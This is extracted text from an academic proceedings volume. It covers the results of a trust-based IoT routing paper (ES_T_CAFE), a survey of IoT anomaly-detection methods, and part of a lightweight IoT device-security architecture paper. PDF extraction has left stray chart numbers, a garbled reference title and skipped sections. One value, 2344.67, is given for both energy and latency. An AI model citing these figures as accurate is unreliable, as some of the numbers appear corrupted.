0.25 ELPFR-MC
0.2 T_CAFE
0.15
ES_T_CAFE
0.1
0.05
0
5 10 15 20 25
Buffer Size (MB)
Figure 2 shows the impact of increasing buffer size on residual energy level of
a node at the completion of simulation. As the buffer size is increased, there are
lesser chances of a packet getting dropped, thereby saving node’s energy. Thus, with
increasing buffer size, the leftover energy of a node also increases. The average value
of leftover energy for ES_T_CAFE is 2344.67 J which is 11% higher than T_CAFE
and 38% higher than ELPFR-MC. The impact of varying buffer on average latency is
shown in Fig. 4. With increasing buffer size, the latency increases as the packet spends
more time in the buffer. The average delay in delivering packets for ES_T_CAFE is
observed to be 2344.67 s.
134 N. Kandhoul and S. K. Dhurandher
35000
25000
20000
ELPFR-MC
15000
T_CAFE
10000 ES_T_CAFE
5000
0
5 10 15 20 25
Buffer Size (MB)
6000
5000
Messages Dropped
4000
3000 ELPFR-MC
T_CAFE
2000
ES_T_CAFE
1000
0
5 10 15 20 25
Buffer Size (MB)
5000
4500
Average Latency (sec)
4000
3500
3000
2500 ELPFR-MC
2000 T_CAFE
1500
ES_T_CAFE
1000
500
0
5 10 15 20 25
Buffer Size (MB)
0.45
0.4
0.35
Delivery Probability 0.3
0.25
ELPFR-MC
0.2
T_CAFE
0.15
0.1 ES_T_CAFE
0.05
0
5 10 15 20 25
TTL ( Minutes)
40000
Node's residual energy (Joules)
35000
30000
25000
20000 ELPFR-MC
15000 T_CAFE
10000 ES_T_CAFE
5000
0
5 10 15 20 25
TTL ( Minutes)
The effect of changing the packet’s time to live is then observed on simulation
metrics as shown in Figs. 5, 6, 7 and 8. Figure 5 shows that raising the value of
message TTL results in a drop in probability of message delivery. This is due to the
fact that the buffer is more occupied with increased message TTL as the messages
tend to live longer, thus raising the probability of messages getting dropped. The
average probability for message delivery for ES_T_CAFE is 0.3934, which is 8.42%
better as compared to T_CAFE and and 18% higher than ELPFR-MC. The residual
energy at the end of simulation drops with enhancing TTL as shown in Fig. 6. As the
messages are spending longer time in buffer, the node’s energy is wasted in dropping
them later on for freeing the buffer. The average residual energy for ES_T_CAFE is
30261.51 J which is the highest.
From Fig. 7, it can be observed that the count of packets getting dropped is increas-
ing with growing TTL. The messages stay in buffer for a larger period of time, enhanc-
ing its chances of getting dropped as depicted in Fig. 5. The average count of dropped
136 N. Kandhoul and S. K. Dhurandher
7000
6000
Messages Dropped
5000
4000
ELPFR-MC
3000
T_CAFE
2000 ES_T_CAFE
1000
0
100 150 200 250 300
TTL ( Minutes)
8000
7000
Average Latency (sec)
6000
5000
4000 ELPFR-MC
3000 T_CAFE
2000 ES_T_CAFE
1000
0
5 10 15 20 25
TTL ( Minutes)
messages for ES_T_CAFE is 5.42% lower than T_CAFE and and 9.1% lower than
ELPFR-MC. The average delay in packet delivery is increased with enhancing TTL.
Figure 8 demonstrates that the observed delay for ES_T_CAFE is around 3414.97 s.
5 Conclusion
An energy- and space-efficient secure routing protocol for OppIoT (called ES_T_
CAFE) is proposed in this paper. ES_T_CAFE depends on the node’s leftover energy,
free buffer size and trust-based probability of packet delivery for making message
forwarding decisions. Including the parameters of space and energy enhances the
efficiency of routing protocols as the devices involved are usually constrained in terms
of storage space and battery capacity. Simulation results prove that ES_T_CAFE
outperforms T_CAFE and ELPFR-MC in terms of node’s residual energy, messages
dropped, message delivery probability and average latency. In future, the authors
plan to investigate the impact of message encryption on the proposed scheme.
An Energy- and Space-Efficient Trust-Based Secure … 137
References
1. Atzori, L., Iera, A., & Morabito, G. (2010). The internet of things: A survey. Computer Net-
works, 54(15), 2787–2805.
2. Pelusi, L., Passarella, A., & Conti, M. (2006). Opportunistic networking: Data forwarding in
disconnected mobile ad hoc networks. IEEE Communications Magazine, 44(11), 134–141.
3. Guo, B., Zhang, D., Wang, Z., Yu, Z., & Zhou, X. (2013). Opportunistic IoT: Exploring the
harmonious interaction between human and the internet of things. Journal of Network and
Computer Applications, 36(6), 1531–1539.
4. Sicari, S., Rizzardi, A., Grieco, L. A., & Coen-Porisini, A. (2015). Security, privacy and trust
in internet of things: The road ahead. Computer Networks, 76, 146–164.
5. Wu, Y., Zhao, Y., Riguidel, M., Wang, G., & Yi, P. (2015). Security and trust management in
opportunistic networks: A survey. Security and Communication Networks, 8(9), 1812–1827.
6. Chen, R., Guo, J., & Bao, F. (2016). Trust management for SOA-based IoT and its application
to service composition. IEEE Transactions on Services Computing, 9(3), 482–495.
7. Kandhoul, N., Dhurandher, S. K., & Woungang, I. (2019). T X X S L AHU N D X XC AF E : A
trust based security approach for opportunistic IOT. In IET Communications.
8. Dhakne, A. R., & Chatur, P. N. (2017). Detailed survey on attacks in wireless sensor network.
In Proceedings of the International Conference on Data Engineering and Communication
Technology (pp. 319–331). Springer.
9. Gao, S., Zhang, L., & Zhang, H. (2010). Energy-aware spray and wait routing in mobile
opportunistic sensor networks. In 2010 3rd IEEE Intl. Conference on Broadband Network and
Multimedia Technology (pp. 1058–1063). IEEE.
10. Chilipirea, C., Petre, A.-C., & Dobre, C. (2013). Energy-aware social-based routing in oppor-
tunistic networks. In 2013 27th International Conference on Advanced Information Networking
and Applications Workshops (pp. 791–796). IEEE.
11. Duan, J., Gao, D., Yang, D., Foh, C. H., & Chen, H.-H. (2014). An energy-aware trust derivation
scheme with game theoretic approach in wireless sensor networks for IoT applications. IEEE
Internet of Things, 1(1), 58–69.
12. Sharma, D. K., Dhurandher, S. K., Woungang, I., Arora, J., & Gupta, K. (2016). History-based
secure routing protocol to detect blackhole and greyhole attacks in opportunistic networks. In
Recent Advances in Communications and Networking Technology (Vol. 5, No. 2, pp. 73–89).
13. Krishna, M. B., & Lorenz, P. (2017). Delay aware secure hashing for opportunistic message
forwarding in internet of things. In Globecom Workshops, 1–6. IEEE.
14. Dhurandher, S. K., Kumar, A., & Obaidat, M. S. (2017). Cryptography-based misbehaviour
detection and trust control mechanism for opportunistic network systems. IEEE Systems Jour-
nal, 12(4), 3191–3202.
15. Borah, S. J., Dhurandher, S. K., Woungang, I., Kandhoul, N., & Rodrigues, J. J. C. (2018). An
energy-efficient location prediction-based forwarding scheme for opportunistic networks. In
IEEE ICC, 1–6.
16. Kandhoul, N., & Dhurandher, S. K. (2019). An asymmetric RSA based security approach for
opportunistic IoT. In WIDECOM (pp. 47–60). Milan, Italy: Springer.
17. Keränen, A., Ott, J., & Kärkkäinen, T. (2009). The one simulator for DTN protocol evaluation.
In Proc. of the 2nd International Conference on Simulation Tools and Techniques (pp. 1–10).
Institute for Computer Sciences, Social-Informatics and Telecommunications Engineering.
18. Crawdad haggle dataset. https://crawdad.org/uoi/haggle/20160828/one. Accessed: 2019-10-
18.
A Survey on Anomaly Detection
Techniques in IoT
Abstract When small every day ‘things’ or objects are augmented with computing
capabilities, and a connection is created between them, it makes a network of Internet
of things (IoT) devices. Since the IoT devices have reached the home users as well, it
has become crucial to maintain the integrity of these devices and prevent any unethical
mis happening under the name of security flaws. Many researchers have proposed
several techniques for such causes, from understanding propagation behavior and
influential factors to develop frameworks like software-defined anything (SDx) in
order to detect and mitigate security attacks in the IoT devices. In this paper, a survey
of such techniques is presented, which has been published in the decade of 2010 to
2020, with a focus on recent publications and a comparison study of all the mentioned
sources. The aim of this survey is to motivate the researcher in the area of IoT and
its security and understand what the current trend is and what the future holds for
development in the area.
1 Introduction
The era of Internet of Things (IoT) has come forth; every little item in the household is
being converted to a digital alternative, every item is being equipped with a processor,
these items are getting connected to each other, performing in sync, and providing
ease to the humankind. Internet offers global communication worldwide; hence,
all of these devices can be accessed from anywhere in the world. The technology
behind IoT has been growing at a swift pace for the past decade, but recently, with
the advancement in technology and faster communication with efficient bandwidth
control, the pool of IoT devices has seen a burst in growth [1]. With an estimate
of twenty-two billion IoT devices currently connected to the Internet, which is only
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 139
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_11
140 P. Sharma and S. K. Sharma
going to increase as time passes, and is expected to pass the fifty billion mark in 2030
[2].
IoT devices can be majorly defined under three categories,
a. Big Things,
Big Things do not mean big in size, but in the complexity of their design and
how these things work. For instance, a tele company manages their big IoT
devices, like base stations, mobile station controllers, etc., all of these devices
are connected to power outlets. They are connected to internet as well, without
the need for bandwidth control, and there are thousands of parameters to be
controlled in this scenario.
b. Small Things,
Small IoT devices are the small simpler things in terms of complexity that are
being used every day by the average and are connected to the internet. This
category contains mostly sensors and small devices that can run on battery
power and are supposed to have efficient bandwidth control as most of the time;
these devices use a subscriber identity module or a SIM card. [3] For instance,
a smart bulb or tube light at home, these kinds of devices follow the set and gate
rule and do not have thousands of parameters to work on.
c. Non-IP things,
These are the things that are called IoT, but are not really IoT, because they are
not connected to the internet. These are things like ZigBee, Z-Wave, and BLE,
all of these are IoT protocols, but are not using the internet, but they become
IoT devices with the help of a gateway. It adds a layer of complexity, but it is
still much lesser than the big things’. The data model is just as simple as the
small things.
As internet applications are growing day-by-day, their security against intrusion
has been becoming a significant issue [4]. IoT devices have not been glorious in terms
of security. IoT devices have to face certain challenges when it comes to security;
as they are heterogeneous devices, it becomes complex to form a secure mechanism
that can be implemented by all of the devices; instead, all individual devices require
a unique security mechanism. The second challenge comes from the very advantage
of IoT devices itself, i.e., the interconnectivity; since all of the devices are connected
with each other, if one of them gets compromised, it is relatively easy to intrude other
devices as well.
As the world is moving forward with the implementation of smart cities and
interconnected devices, correct maintenance practices [5]. The security mechanisms
have become a crucial part of the research for such devices, and therefore, a secure
IoT infrastructure should be created which will provide security from all of the
cybercrimes and protect the vulnerabilities of the devices, as in a smart city, data is
of utmost value, even more than money; therefore, the IoT security infrastructure
should be built in such a way that even if it gets compromised, it has the ability to
recover back, and for such purposes, several techniques have been exploited, and in
this paper, a survey of all of these techniques has been presented. The key aspect of
A Survey on Anomaly Detection Techniques in IoT 141
this paper is that making the realization that anomaly detection has provided more
protection than other machine learning-based techniques in terms of IoT security.
The anomaly based technique follows an item’s behavior; the observations made
on the behavior of an item/object are recorded and learned. If for any reason, a
change is observed in the behavior of the item/object, it is marked as an anomaly or
a deviation, which are not supposed to be in the system and are hence used as an
alarming situation. Hence, it is also known as profile-based detection technique. The
anomaly based detection technique detects these unknown patterns and reports them
[6].
As Fig. 1 mentions, the requests from the devices are analyzed at the server level,
and when the service request is detected as an outlier/Ab-Normal request, the request
is declined and an alarm is sent to the administrator. The flow chart of the working
of anomaly detection is mentioned below in Fig. 2.
This paper is arranged systematically as follows: Related work has been described
in Sect. 2. Section 3 formulates a comparison in which analysis of the various machine
learning algorithms have been described. Finally, the conclusion of algorithms has
been described in Sect. 4.
2 Literature Review
In this section, some of the research work done in the IoT security area has been
reviewed, the aim of this survey is to motivate the researcher in the area of IoT and
its security, and understand what the current trend is and what the future holds for
development in the area.
In the research done by Hasan et al. [8], they have used various machine learning
techniques like logistic regression (LR), support vector machine (SVM), decision
tree (DT), random forest (RF), and artificial neural network (ANN), and performed
analysis of their accuracy in terms of secure infrastructure for IoT devices. For each
of the techniques, they have reached more than 98% accuracy.
Liu et al. [9], proposed a state of detection based on ‘ON’ and ‘OFF’, which
means that a malicious attack can be performed on an IoT device, while during the
IoT device is in its sleep mode. They also noticed that after getting attacked, they
A Survey on Anomaly Detection Techniques in IoT 143
do not change their work and perform the same tasks in an ordinary manner, so it is
challenging to detect compromised devices.
Diro et al. [10], proposed a fog-to-things architecture, which is based on deep and
shallow neural networks, and they performed their experiment on an open-source
database. Their experiment was based on detecting anomalies for the four test classes,
and they achieved 98.27% accuracy in their deep neural network model and 96.75%
accuracy in their shallow neural network model.
Hodo et al. [11], performed a threat analysis using an artificial neural network
(ANN), the main focus of the analysis performed by them was to classify normal and
threat patterns in an IoT network. They performed their experiment in a simulated
IoT environment, and achieved an accuracy of 99.4%, and they verified the fact that
IoT based on ANNs can successfully detect DDoS/DoS attacks.
Pacheco et al. [12], proposed a framework for threat analysis made up of four
different layers, devices, network, service, and application layer. Their experiment
claims to identify potential attacks and provide a method of mitigation from the
compromised system and perform full recovery. Their classification model reached
an accuracy of 98% for known attacks and 97.4% for unknown attacks.
Golomb et al. [13], proposed a new framework, CIoTA: Collaborative IoT
anomaly detection via blockchain. This framework is based on the concept of
blockchain, which allows it to perform distributed anomaly detection. Their exper-
iment was performed in a simulated environment, and the overhead of their system
reached only upto 6.5% and was able to withstand all of the exploitation experiments
performed on it.
Alrashdi et al. [14], worked on the problem of security issues in smart city IoT
devices, and proposed an anomaly based random forest classifier to detect compro-
mised IoT devices at distributed fog nodes. Their experiment achieved an accuracy
rate of 99.34%.
Garg et al. [15], performed analysis on a clustering technique used in IoT devices,
which is density-based spatial clustering of applications with noise, i.e., DBSCAN,
which is used to detect anomalies, however, they discovered that DBSCAN suffers
from two issues, parameter selection, and finding the correct nearest neighbor. They
provided a multi-stage model using the Boruta algorithm in order to capture the set
with the most relevancy, and firefly algorithm, in order to correctly find the centroid.
Their experiment yielded an accuracy of 96.23%.
Luo and Nagarajan [16], introduced auto-encoder neural networks into the wire-
less sensor networks (WSNs) in order to solve the issue of elusive nature of anoma-
lies and the volatility present in ambient environments. Their experiment reduced
the overhead and the computational load by moving this task from the IoT device to
the cloud itself. They achieved higher accuracy with lower false positive rates than
their existing counterparts. Their experiment also claims to be adaptive to the new
changes made in the network.
Nguyen et al. [17], presented a new framework for IoT security, named as DÏoT,
which is an autonomous self-learning distributed system, which can be used to detect
compromised IoT devices in a network. This framework does not require human inter-
vention and is able to successfully detect anomalies caused by malicious adversaries.
144 P. Sharma and S. K. Sharma
It employs a federated learning approach, and is able to adapt to new and unknown
attacks. Their experiment yielded a high-accuracy rate of 95.6% with no false alarms
in the real world situation.
Data can be collected from various sources, and can be mined as well, but knowl-
edge discovery does not yield enough results to help make a controlling action.
This is where anomaly detection comes into the picture, IoT sensors can detect rich
information, this additional information provides enough data to classify the action as
anomalous or normal [18, 19]. In this section, the literature review has been compared
in Table 1, and empirical analysis has been provided afterward.
It has been found out that most of the research done in the area of security improve-
ment using anomaly detection in IoT devices is based on machine learning algorithms
and their various classifiers, and the most influential application is ‘Smart Cities.’
The selections of the research paper have been from the year 2014–2020. The tech-
nical insight has been reviewed in Sect. 2 in order to have an impact on the reader for
this field of research. The above comparison can provide the reader with the details
of techniques that are actively being improved for anomaly detection in IoT devices,
and then, it can make a learned decision of where the energy should be invested
in order to overcome the existing challenges. Considering the potential applications
of IoT devices in future, it is a crucial requirement to not only make such highly
secure frameworks for the upcoming IoT devices but also make advancements so
that the current generation of IoT devices can be upgraded without requiring the user
to remove the devices from the network for a considerable amount of time.
4 Conclusion
As the IoT devices have seen a burst in the growth of both creation and usage, it has
become a crucial requirement to maintain the integrity of these devices and prevent
any unethical mis happening under the name of security flaws. According to some
researchers, securing the IoT devices’ access points and addressing the weaknesses
would be able to solve the problem, but IoT devices need to be secured as whole units
and should be able to recover from a compromised situation. For that purpose, in this
paper, a survey of such techniques is presented, with a comparison study of all the
mentioned sources. The aim of this survey is to motivate the researcher in the area
of IoT and its security and understand what the current trend is and what the future
holds for development in the area. As it has been analyzed, the security enhance-
ments are being done with the help of machine learning techniques to improve the
anomaly detection of IoT devices as the sensors present in IoT devices capture rich
information, useful enough to make a correct classification of normal or anomalous
behavior. Future application in this area could be to make such adjustments in the
security infrastructure that even if the attacker learns the sensor information and
gains enough access to launch a replay attack, the IoT device is able to mitigate and
recover successfully. This situation might be solved with the help of MTD strategy,
making it very difficult to perform analysis on the IoT device’s database.
References
1. Lueth, K. L. (2014). Why the internet of things is called internet of things: Definition, history,
disambiguation. IoT Analytics, 19.
2. shorturl.at/stPX2 accessed on 26th Dec 2020
3. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement, 150, 107077.
4. Singh Bhati, N., Khari, M., Garcia-Diaz, V., & Verdu, E. (2020). A review on intrusion detection
systems and techniques. International Journal of Uncertainty, Fuzziness and Knowledge-Based
Systems.
5. Bhati, B. S., & Rai, C. S. (2020). Ensemble based approach for intrusion detection using extra
tree classifier. Intelligent computing in engineering (pp. 213–220). Singapore: Springer.
6. Bhati, B. S., Chugh, G., Al-Turjman, F., & Bhati, N. S. (2020). An improved ensemble based
intrusion detection technique using XGBoost. Transactions on Emerging Telecommunications
Technologies, e4076.
7. Gurina, A., & Eliseev, V. (2019). Anomaly-based method for detecting multiple classes of
network attacks. Information, 10(3), 84.
146 P. Sharma and S. K. Sharma
8. Hasan, M., Islam, M. M., Zarif, M. I. I., & Hashem, M. M. A. (2019). Attack and anomaly
detection in IoT sensors in IoT sites using machine learning approaches. Internet of Things, 7,
100059.
9. Liu, X., Liu, Y., Liu, A., & Yang, L. T. (2018). Defending ON–OFF attacks using light
probing messages in smart sensors for industrial communication systems. IEEE Transactions
on Industrial Informatics, 14(9), 3801–3811.
10. Diro, A. A., & Chilamkurti, N. (2018). Distributed attack detection scheme using deep learning
approach for internet of things. Future Generation Computer Systems, 82, 761–768.
11. Hodo, E., Bellekens, X., Hamilton, A., Dubouilh, P. L., Iorkyase, E., Tachtatzis, C., & Atkinson,
R. (2016). Threat analysis of IoT networks using artificial neural network intrusion detec-
tion system. In 2016 International Symposium on Networks, Computers and Communications
(ISNCC) (pp. 1–6). IEEE.
12. Pacheco, J., & Hariri, S. (2018). Anomaly behavior analysis for IoT sensors. Transactions on
Emerging Telecommunications Technologies, 29(4), e3188.
13. Golomb, T., Mirsky, Y., & Elovici, Y. (2018). CIoTA: collaborative IoT anomaly detection via
blockchain. arXiv preprint arXiv:1803.03807.
14. Alrashdi, I., Alqazzaz, A., Aloufi, E., Alharthi, R., Zohdy, M., & Ming, H. (2019). Ad-iot:
Anomaly detection of iot cyber attacks in smart city using machine learning. In 2019 IEEE 9th
Annual Computing and Communication Workshop and Conference (CCWC) (pp. 0305–0310).
IEEE.
15. Garg, S., Kaur, K., Batra, S., Kaddoum, G., Kumar, N., & Boukerche, A. (2020). A multi-stage
anomaly detection scheme for augmenting the security in IoT-enabled applications. Future
Generation Computer Systems, 104, 105–118.
16. Luo, T., & Nagarajan, S. G. (2018). Distributed anomaly detection using autoencoder neural
networks in wsn for iot. In 2018 IEEE International Conference on Communications (ICC)
(pp. 1–6). IEEE.
17. Nguyen, T. D., Marchal, S., Miettinen, M., Fereidooni, H., Asokan, N., & Sadeghi, A. R.
(2019). DÏoT: A federated self-learning anomaly detection system for IoT. In 2019 IEEE 39th
International Conference on Distributed Computing Systems (ICDCS) (pp. 756–767). IEEE.
18. Ukil, A., Bandyoapdhyay, S., Puri, C., & Pal, A. (2016). IoT healthcare analytics: The
importance of anomaly detection. In 2016 IEEE 30th international conference on advanced
information networking and applications (AINA) (pp. 994–997). IEEE.
19. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
Novel IoT End Device Architecture
for Enhanced CIA: A Lightweight
Security Approach
Abstract Security is a burning issue in wearable IoT end devices. The exponen-
tial growth of IoT has deligated processing and storage from cloud to wearable end
devices. Due to resource constrained nature of IoT end devices, balancing lightweight
and implementing security are a challenge. In this paper, lightweight within IoT
end devices is ensured by shifting virtualization over fog node and implementing
lightweight secure internet of things (SIT) cryptographic algorithm using Arduino
IDE over ESP32. Stable chain of trust creates robust trusted execution environ-
ment (TEE) to ensure security within IoT devices. Inter IoT devices security is
ensured by encrypted one time password (OTP) using SIT algorithm. SIT algorithm
is lightweight since it consumes key size of 64 bits and 22 bytes of run time memory
with the total encryption and decryption execution time 0.375 ms and is optimum
for our proposed lightweight IoT end device architecture.
1 Introduction
Internet of Things (IoT) architecture comprised of cloud core, fog nodes and end
devices [1]. Wearable end devices have least processing and storage and communi-
cate with cloud core via fog node. With the growth of IoT systems processing and
storage has been deligated from the cloud to the edge hence increased attack over
end devices [11] resulting into over-architectured and vulnerable IoT End devices.
A typical Type-1 hypervisor based IoT end device architecture [15] is shown in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 147
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_12
148 P. Mishra et al.
Fig. 1. Since hypervisor is at level 1 therefore this type of device is known as Type-1
hypervisor based IoT end device. This architecture comprises of bare metal at level
0 for processing and storage. A thin software layer hypervisor at level 1 creates
virtualization and monitors virtual machine’s behavior also provides temporal and
spatial isolations at run time. Virtual machine comprised of guest OS(s) at level 2
and virtual applications at level 3. An inter virtualization extension technology (VTx)
implements sharing of processors and footprints to the VMs [8]. All the trusted hard-
wares and softwares within the IoT end devices form trusted computing base (TCB)
hence chain of trust (CoT), followed by trusted execution environment (TEE) to
establish guranteed security in terms of confidentiality, integrity and authenticity
(CIA).
The bulky TCB components in wearable devices incur overweight and complexity
followed by more bugs, vulnerabilities and overheads. The more area exposed [2,
7] to the untrusted external world the more unsecure thus breach of trust therefore
week TEE [11]. The protection of TCB is ensured by minimum size and minimum
complexity hence TCB minimization is mandatory for lightweight and secured IoT
end devices [9]. As shown in Fig. 1, higher layers of IoT end device architecture
are the easiest target for threats with high-attack volume with minimum efforts and
minimum resources due to direct interaction with the external untrusted world, but
lower layers of IoT end devices require huge efforts and resources [3] thus difficult
to attack due to uninterrupted secure boot process.
Therefore in our proposed architecture lightweight micro (µ)-hypervisor [4] has
been implemented on fog node to shift virtual machines from the IoT end devices
to the fog nodes in order to minimize the TCB components resulting into secured
IoT end devices. Lightweight SIT algorithm implemented due to least possible code
Novel IoT End Device Architecture … 149
size since IoT end devices are characterized by low storage, low-runtime memory
and requirements of least execution time. Thus, lightweight and trusted components
are having less complexity hence minimum or no bugs and also support minimum
latency so as to ensure security in terms of confidentiality, integrity, authenticity
(CIA). The external trusted world devices must only be allowed to interact with
trusted IoT edge devices due to inevitable security requirements. Due to resource
limitations in the IoT end devices we need lightweight TCB components in terms of
minimum footprint, minimum latency [9, 10].
The objective of this paper is to propose a novel lightweight architecture with
the implementation of a lightweight cryptographic algorithm so as to enhance CIA.
The contribution of the rest of the paper is that Sect. 2 summarizes literature review.
Section 3 discusses the need of lightweight cryptographic algorithm. Sections 4 and 5
present novel lightweight architecture and its functionality. Section 6 presents results
and discussion. Section 7 concludes the paper.
2 Literature Review
• IoT end devices security holes could not be properly understood [12].
• IoT device architecture in [5] claims lightweight, but over-architectured as
compared to our proposed one due to hypervisor size approx. 13 K and hyper-
visor based virtualization at IoT end devices. It has no remote updates, no secured
terminal access, no provision against internal bugs and vulnerabilities within TCB
and partial confidentiality, integrity, authenticity.
• IoT device architectures in [6, 7, 13] is over-architectured due to no lightweight
considerations hence unsecured. These architectures have no provisions for side
channel attack and have partial confidentiality, integrity but no authenticity.
• Security mechanisms evaluated in [19] conclude that key size, number of rounds
and word size increases execution time of cryptographic algorithm.
• The lesser is the key size of the crytographic algorithm the faster will be the
algorithm. Since research papers [16–19] use 128 bit key size sufficient to slow
down execution process.
• Usman et al. [14] mention that implementation of conventional computationally
expensive security algorithms will result in the hindrance on the performance of
wearable devices.
keys. These keys are used to encrypt and decrypt communication between IoT edge
and fog node.
Table 1 shows the comparison between various cryptographic algorithms. Key
sizes are in bits, code sizes and RAM are in bytes. The cycles involve encryption
(enc), decryption (dec) and key expansions to secure the keys involved in encryption,
decryption. As mentioned in table SIT uses optimal resources of 64 bits key, 826 bytes
code, 22 byte RAM. The encryption and decryption are also faster and better than
the other cryptographic algorithms. Thus, SIT is optimal for wearable IoT devices.
Novel proposed architecture comprised of three components. (i) Fog node (ii) Web
Interface (iii) IoT end device. The description of the architecture is in Sects. 4.1, 4.2
and 4.3.
As shown in Fig. 2 fog node is having (i) Bare Metal at the bottom with one time
memory having BL with RPK. When powers on boot process ensures CIA. The
authentication from lower to upper layer continues till all the softwares are uploaded
thus chain of trust (CoT) is built hence robust trusted execution environment (see R.
TEE in Fig. 2) is established. (ii) µ-visor (see Fig. 2) lies in the middle between bare
metal and virtual machine. µ-visor is the thinnest software layer lesser in size in terms
of lines of codes and consumes lesser resources compared to traditional hypervisors
and most feasible for wearable lightweight IoT end devices. µ-visor creates virtual
machines (VM) at the top layer and monitors VM’s behavior. µ-visor also provides
spatial and temporal separation at run time through inters virtualization extension
(VTX). If VM does any spoilage µ-visor blocks that VM and issues alert for further
Novel IoT End Device Architecture … 151
necessary actions. Additionally, here µ-visor generates one time password (OTP)
and encrypts OTP.
Encrypted OTP is sent to an IoT end device via transceiver when an end device tries
to connect with fog node. Every VM consists of signature (see Fig. 2) to register new
IoT end devices and connects already registered IoT end devices. After registration
every fog node will have user id and password along with device id of all the end
devices. Every IoT end device will also store its own the user id and password along
with device id. If already registered IOT end device want to connect to the fog node
then that end device will send user id and password along with device id to the fog
node. Fog node thereafter will search the respective user id and password along with
device id in its own database. If search successful fog node issues one time password
(OTP) to the respective IOT end device. After OTP verification respective IoT end
device gets connected to the fog node. Once connection is established VM starts
receiving data from that IOT end device. To identify data source received data is then
given to data fragmentation and device identification (see Data Frag. & Device ID in
Fig. 2) block for (1) identification of device using frames coming from respective IoT
end device (See Data Frame in Fig. 3–6). (2) Identification of device using device
ID (see Device ID in Fig. 3). Data decryption block (See D. DEC. in Fig. 4) then
decrypts data encrypted at IoT end so as get the original data. Finally, data processing
block (See D. Pro. in Fig. 4) ensures delivery of the processed data to external world.
Watch dog stored in one time memory continuously runs and keeps track of any
152 P. Mishra et al.
spoilage if any such malignancy is detected an alert is issued for further necessary
actions hence a bug free system. A bug free system will be more trusted and establish
stable CoT resulting into robust TEE hence trusted fog node.
As shown in Fig. 2, WI allows communication between IoT end device and fog
node. WI has device id and password block to register and connect an IoT end device
with fog node. WI also has OTP block to authenticate IoT end device before data
transmission to the fog node.
As shown in Fig. 3, bare metal has same boot features as in the fog node (see Fig. 2)
thereafter third party signature at the software layer is examined and authenticated
by boot loader [see Fig. 3(2)] then software layer is uploaded [see Fig. 3(3)] thus
stable chain of trust (CoT) creates robust TEE resulting into trusted IoT end device.
Software layer comprises of (i) Sensor data block to store sensed data in data buffer
[see Fig. 3(4)]. (ii) Secure internet of things (SIT) encryption block encrypts sensed
data using SIT lightweight algorithm. (iii) Data frame block converts encrypted
data into data frames by adding device id in the header [see Fig. 3(5)]. (iv) Data
transmission block transmits data frames to the fog node via transceiver using web
Novel IoT End Device Architecture … 153
interface [see Fig. 3(7)]. (v) SIT OTP decryption block [see Fig. 3(8)] decrypts
OTP from fog node using SIT decryption algorithm and is further sent for device id
verification via web.
As shown in Fig. 4 in the beginning when an edge device is ready user will provide 64-
bit cipher key [see Fig. 4(1)]. This key is stored in write once memory and generates
the unique keys for encryption [as shown in Fig. 4(2)]. Thereafter, sensor data in the
data buffer is encrypted by SIT encryption algorithm [14] using this unique key [as
mentioned in Fig. 4(3)]. The encrypted data is then converted into data frames [as
presented in Fig. 4(4)] where device id is included in the header of the encrypted
154 P. Mishra et al.
data packet. The encrypted data packet is sent to the fog node through the transceiver
[as given in Fig. 4(5)]. Fog node receives data packets [see Fig. 4(5)] and fragments
them to obtain encrypted data and device ID of IoT end device. Fog node here checks
whether the device ID is verified or not [see Fig. 4(6)]. If not verified [see Fig. 4(7)]
ID is passed to the web interface for verification [see Fig. 4(8)]. Now user will
provide 64-bit cipher key for the verification of IoT end device id at the fog node
[see Fig. 4(9)]. Verification of IoT end device id is done only when first time IoT end
device will connect with fog node. Once cipher key is obtained fog node’s µ-visor
will generate OTP [see Fig. 4(10)]. This OTP is encrypted using SIT algorithm [see
Fig. 4(11)] and is sent to the transceiver for transmission to the edge device [see
Fig. 4(12)]. IoT edge device receives the encrypted OTP and passes it to the OTP
decryption block where it is decrypted using SIT decryption and its unique keys
[see Fig. 4(13)]. The decrypted OTP is then passed to the user [see Fig. 4(14)]. User
takes this OTP and enters it into the web interface for verification [see Fig. 4(15)].
If received OTP matches with generated OTP, the device ID and the corresponding
64-bit cipher text is stored in a secure storage at the fog node for latter verification
[see Fig. 4(16)]. This completes the set up. Next time when IoT end device sends
data then fog node will fetch the cipher key from the secure storage based on device
ID [see Fig. 4(17)] to generate the unique key [see Fig. 4(18)] so as to decrypt the
data using the SIT decryption algorithm [see Fig. 4(19)].
The decrypted data is then sent to the data processing block of the fog node
for further processing [see Fig. 4(20)]. This concludes how the SIT cryptographic
algorithm would work on the proposed lightweight architecture and thus making it
secure.
To ensure, lightweight host OS was avoided both at fog and at IoT edge. Lightweight
µ-hypervisor implemented only at fog node but not at IoT edge device hence virtual-
ization transferred from IoT edge to fog node. Transfer of virtualization minimized
TCB area hence minimized resource utilization, minimized memory and enhanced
performance thus reduced attack surface at IoT end device. A bug free TCB and
authentication between TCBs creates stable chain of trust (CoT) resulting into robust
TEE (R.TEE). SIT encrypted OTP is sent by fog to IoT end device during login
ensures CIA. SIT algorithm consumes only about 22 bytes of memory with encryp-
tion and decryption execution time 0.188 and 0.187 ms, respectively. µ-hypervisor
and software consumed about 32.75% of the total 4 MB flash and 6.30% of 520 KB,
i.e., 32.77 KB SRAM is thus total footprint 39.05%. Based on Table 1 comparison
graph of algorithms in Fig. 5 shows that SIT is best in terms of encryption, decryption
cycle time and code size hence best for lightweight secured fog and IoT end device.
Novel IoT End Device Architecture … 155
7 Conclusion
The proposed novel IoT architecture implements stable chain of trust hence robust
trusted execution environment for intra IoT devices security. Trusted connection
established between IoT end devices and fog nodes before data transmission. End
device verification is performed using encrypted OTP to guarantee confidentiality
(OTP leakage not possible), integrity (OTP change not possible) and authenticity (end
device verification by user of the device). The implementation of lightweight SIT
